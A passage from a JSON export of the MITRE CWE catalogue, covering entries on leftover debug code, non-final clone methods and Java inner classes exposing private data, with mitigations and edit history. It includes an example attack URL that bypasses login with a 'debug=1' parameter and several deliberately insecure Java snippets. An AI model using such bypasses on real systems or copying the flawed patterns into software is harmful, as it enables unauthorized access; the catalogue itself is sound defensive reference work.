Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Data Leaking Between Users","attr":{"@_Date":"2008-04-11"}},{"#text":"Data Leak Between Sessions","attr":{"@_Date":"2011-03-29"}}]}},"489":{"attr":{"@_ID":"489","@_Name":"Active Debug Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.","Extended_Description":"A common development practice is to add \\"back door\\" code specifically designed for debugging or testing purposes that is not intended to be shipped or deployed with the application. These back door entry points create security risks because they are not considered during design or testing and fall outside of the expected operating conditions of the application.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"215","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Leftover debug code","Description":"This term originates from Seven Pernicious Kingdoms"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"In web-based applications, debug code is used to test and modify web application properties, configuration information, and functions. If a debug application is left on a production server, this oversight during the \\"software process\\" allows attackers access to debug functionality."},{"Phase":"Build and Compilation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Other"],"Impact":["Bypass Protection Mechanism","Read Application Data","Gain Privileges or Assume Identity","Varies by Context"],"Note":"The severity of the exposed debug application will depend on the particular instance. At the least, it will give an attacker sensitive information about the settings and mechanics of web applications on the server. At worst, as is often the case, the debug application will allow an attacker complete control over the web application and server, as well as confidential information that either of these access."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Build and Compilation","Distribution"],"Description":"Remove debug code before deploying the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Debug code can be used to bypass authentication. For example, suppose an application has a login script that receives a username and a password. Assume also that a third, optional, parameter, called \\"debug\\", is interpreted by the script as requesting a switch to debug mode, and that when this parameter is given the username and password are not checked. In such a case, it is very simple to bypass the authentication process if the special behavior of the application regarding the debug parameter is known. In a case where the form is:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;FORM ACTION=\\"/authenticate_login.cgi\\"&gt;&lt;/FORM&gt;","xhtml:div":{"#text":"&lt;INPUT TYPE=TEXT name=username&gt;&lt;INPUT TYPE=PASSWORD name=password&gt;&lt;INPUT TYPE=SUBMIT&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"http://TARGET/authenticate_login.cgi?username=...&amp;password=..."},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://TARGET/authenticate_login.cgi?username=&amp;password=&amp;debug=1"}],"Body_Text":["Then a conforming link will look like:","An attacker can change this to:","Which will grant the attacker access to the site, bypassing the authentication process."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Leftover Debug Code"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"121"}},{"attr":{"@_CAPEC_ID":"661"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"In J2EE a main method may be a good indicator that debug code has been left in the application, although there may not be any direct security impact.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Alternate_Terms"}],"Previous_Entry_Name":{"#text":"Leftover Debug Code","attr":{"@_Date":"2020-02-24"}}}},"491":{"attr":{"@_ID":"491","@_Name":"Public cloneable() Method Without Final (\'Object Hijack\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Make the cloneable() method final."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, a public class \\"BankAccount\\" implements the cloneable() method which declares \\"Object clone(string accountnumber)\\":","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount implements Cloneable{}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object clone(String accountnumber) throwsCloneNotSupportedException{}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Object returnMe = new BankAccount(account number);...","xhtml:br":["",""]}}}}}}},{"Intro_Text":"In the example below, a clone() method is defined without being declared final.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected Object clone() throws CloneNotSupportedException {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Object Hijack"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ07-J","Entry_Name":"Sensitive classes must not let themselves be copied"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-453"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"Mobile Code: Object Hijack","attr":{"@_Date":"2008-04-11"}},{"#text":"Public cloneable() Method Without Final (aka \'Object Hijack\')","attr":{"@_Date":"2009-05-27"}}]}},"492":{"attr":{"@_ID":"492","@_Name":"Use of Inner Class Containing Sensitive Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers.","Extended_Description":"Inner classes quietly introduce several security concerns because of the way they are translated into Java bytecode. In Java source code, it appears that an inner class can be declared to be accessible only by the enclosing class, but Java bytecode has no concept of an inner class, so the compiler must transform an inner class declaration into a peer class with package level access to the original outer class. More insidiously, since an inner class can access private fields in its enclosing class, once an inner class becomes a peer class in bytecode, the compiler converts private fields accessed by the inner class into protected fields.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"\\"Inner Classes\\" data confidentiality aspects can often be overcome."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Using sealed classes protects object-oriented encapsulation paradigms and therefore protects code from being extended in unforeseen ways."},{"Phase":"Implementation","Description":"Inner Classes do not provide security. Warning: Never reduce the security of the object from an outer class, going to an inner class. If an outer class is final or private, ensure that its inner class is private as well."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java Applet code mistakenly makes use of an inner class.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public final class urlTool extends Applet {}","xhtml:div":{"#text":"private final class urlHelper {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}}}},{"Intro_Text":"The following example shows a basic use of inner classes. The class OuterClass contains the private member inner class InnerClass. The private inner class InnerClass includes the method concat that accesses the private member variables of the class OuterClass to output the value of one of the private member variables of the class OuterClass and returns a string that is a concatenation of one of the private member variables of the class OuterClass, the separator input parameter of the method and the private member variable of the class InnerClass.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class OuterClass {}","xhtml:div":{"#text":"private String memberOne;private String memberTwo;public OuterClass(String varOne, String varTwo) {}private class InnerClass {}","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// private member variables of OuterClass","// constructor of OuterClass","// InnerClass is a member inner class of OuterClass"],"xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"this.memberOne = varOne;this.memberTwo = varTwo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"private String innerMemberOne;public InnerClass(String innerVarOne) {}public String concat(String separator) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.innerMemberOne = innerVarOne;","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.out.println(\\"Value of memberOne is: \\" + memberOne);return OuterClass.this.memberTwo + separator + this.innerMemberOne;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"// InnerClass has access to private member variables of OuterClass","xhtml:br":["",""]}]}]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class OuterClass {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String memberOne;private static String memberTwo;public OuterClass(String varOne, String varTwo) {}private static class InnerClass {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private member variables of OuterClass","// constructor of OuterClass","// InnerClass is a static inner class of OuterClass"],"xhtml:div":[{"#text":"this.memberOne = varOne;this.memberTwo = varTwo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String innerMemberOne;public InnerClass(String innerVarOne) {}public String concat(String separator) {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.innerMemberOne = innerVarOne;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return memberTwo + separator + this.innerMemberOne;","xhtml:br":["",""],"xhtml:i":"// InnerClass only has access to static member variables of OuterClass"}}]}}]}}}}],"Body_Text":["Although this is an acceptable use of inner classes it demonstrates one of the weaknesses of inner classes that inner classes have complete access to all member variables and methods of the enclosing class even those that are declared private and protected. When inner classes are compiled and translated into Java bytecode the JVM treats the inner class as a peer class with package level access to the enclosing class.","To avoid this weakness of inner classes, consider using either static inner classes, local inner classes, or anonymous inner classes.","The following Java example demonstrates the use of static inner classes using the previous example. The inner class InnerClass is declared using the static modifier that signifies that InnerClass is a static member of the enclosing class OuterClass. By declaring an inner class as a static member of the enclosing class, the inner class can only access other static members and methods of the enclosing class and prevents the inner class from accessing nonstatic member variables and methods of the enclosing class. In this case the inner class InnerClass can only access the static member variable memberTwo of the enclosing class OuterClass but cannot access the nonstatic member variable memberOne.","The only limitation with using a static inner class is that as a static member of the enclosing class the inner class does not have a reference to instances of the enclosing class. For many situations this may not be ideal. An alternative is to use a local inner class or an anonymous inner class as shown in the next examples."]},{"Intro_Text":"In the following example the BankAccount class contains the private member inner class InterestAdder that adds interest to the bank account balance. The start method of the BankAccount class creates an object of the inner class InterestAdder, the InterestAdder inner class implements the ActionListener interface with the method actionPerformed. A Timer object created within the start method of the BankAccount class invokes the actionPerformed method of the InterestAdder class every 30 days to add the interest to the bank account balance based on the interest rate passed to the start method as an input parameter. The inner class InterestAdder needs access to the private member variable balance of the BankAccount class in order to add the interest to the bank account balance.","Body_Text":["However as demonstrated in the previous example, because InterestAdder is a non-static member inner class of the BankAccount class, InterestAdder also has access to the private member variables of the BankAccount class - including the sensitive data contained in the private member variables for the bank account owner\'s name, Social Security number, and the bank account number.","In the following example the InterestAdder class from the above example is declared locally within the start method of the BankAccount class. As a local inner class InterestAdder has its scope restricted to the method (or enclosing block) where it is declared, in this case only the start method has access to the inner class InterestAdder, no other classes including the enclosing class has knowledge of the inner class outside of the start method. This allows the inner class to access private member variables of the enclosing class but only within the scope of the enclosing method or block.","A similar approach would be to use an anonymous inner class as demonstrated in the next example. An anonymous inner class is declared without a name and creates only a single instance of the inner class object. As in the previous example the anonymous inner class has its scope restricted to the start method of the BankAccount class."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(double rate){}private class InterestAdder implements ActionListener{}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object","// InterestAdder is an inner class of BankAccount class","// that implements the ActionListener interface"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"ActionListener adder = new InterestAdder(rate);Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private double rate;public InterestAdder(double aRate){}public void actionPerformed(ActionEvent event){}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"this.rate = aRate;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest;","xhtml:br":["","",""],"xhtml:i":"// update interest"}}]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(final double rate){}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"class InterestAdder implements ActionListener{}ActionListener adder = new InterestAdder();Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","xhtml:br":["","","","","","","",""],"xhtml:i":["// InterestAdder is a local inner class","// that implements the ActionListener interface"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent event){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest;","xhtml:br":["","",""],"xhtml:i":"// update interest"}}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance;public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){}public void start(final double rate){}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:i":["// private member variables of BankAccount class","// constructor for BankAccount class","// start method will add interest to balance every 30 days","// creates timer object and interest adding action listener object"],"xhtml:div":[{"#text":"this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ActionListener adder = new ActionListener(){};Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();","xhtml:br":["","","","","",""],"xhtml:i":"// anonymous inner class that implements the ActionListener interface","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent event){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount.this.balance += interest;","xhtml:br":["","","",""],"xhtml:i":["// update interest","double interest = BankAccount.this.balance * rate / 100;"]}}}}}}]}}}}]},{"Intro_Text":"In the following Java example a simple applet provides the capability for a user to input a URL into a text field and have the URL opened in a new browser window. The applet contains an inner class that is an action listener for the submit button, when the user clicks the submit button the inner class action listener\'s actionPerformed method will open the URL entered into the text field in a new browser window. As with the previous examples using inner classes in this manner creates a security risk by exposing private variables and methods. Inner classes create an additional security risk with applets as applets are executed on a remote machine through a web browser within the same JVM and therefore may run side-by-side with other potentially malicious code.","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"public class UrlToolApplet extends Applet {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton;public void init() {}private class SubmitButtonListener implements ActionListener {}","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// private member variables for applet components","// init method that adds components to applet","// and creates button listener object","// button listener inner class for UrlToolApplet class"],"xhtml:div":[{"#text":"setLayout(new FlowLayout());enterUrlLabel = new Label(\\"Enter URL: \\");enterUrlTextField = new TextField(\\"\\", 20);submitButton = new Button(\\"Submit\\");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);ActionListener submitButtonListener = new SubmitButtonListener();submitButton.addActionListener(submitButtonListener);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void actionPerformed(ActionEvent evt) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (evt.getSource() == submitButton) {}","xhtml:div":{"#text":"String urlString = enterUrlTextField.getText();URL url = null;try {} catch (MalformedURLException e) {}if (url != null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"url = new URL(urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"Malformed URL: \\" + urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"getAppletContext().showDocument(url);","attr":{"@_style":"margin-left:10px;"}}]}}}}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class UrlToolApplet extends Applet implements ActionListener {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton;public void init() {}public void actionPerformed(ActionEvent evt) {}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private member variables for applet components","// init method that adds components to applet","// implementation of actionPerformed method of ActionListener interface"],"xhtml:div":[{"#text":"setLayout(new FlowLayout());enterUrlLabel = new Label(\\"Enter URL: \\");enterUrlTextField = new TextField(\\"\\", 20);submitButton = new Button(\\"Submit\\");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);submitButton.addActionListener(this);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (evt.getSource() == submitButton) {}","xhtml:div":{"#text":"String urlString = enterUrlTextField.getText();URL url = null;try {} catch (MalformedURLException e) {}if (url != null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"url = new URL(urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"Malformed URL: \\" + urlString);","attr":{"@_style":"margin-left:10px;"}},{"#text":"getAppletContext().showDocument(url);","attr":{"@_style":"margin-left:10px;"}}]}}}]}}}}],"Body_Text":"As with the previous examples a solution to this problem would be to use a static inner class, a local inner class or an anonymous inner class. An alternative solution would be to have the applet implement the action listener rather than using it as an inner class as shown in the following example."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Mobile Code: Use of Inner Class"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Publicizing of private data when using inner classes"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ08-J","Entry_Name":"Do not expose private members of an outer class from within a nested class"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects\' state and behavior by adversaries who have access to the same virtual machine where your program is running.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated 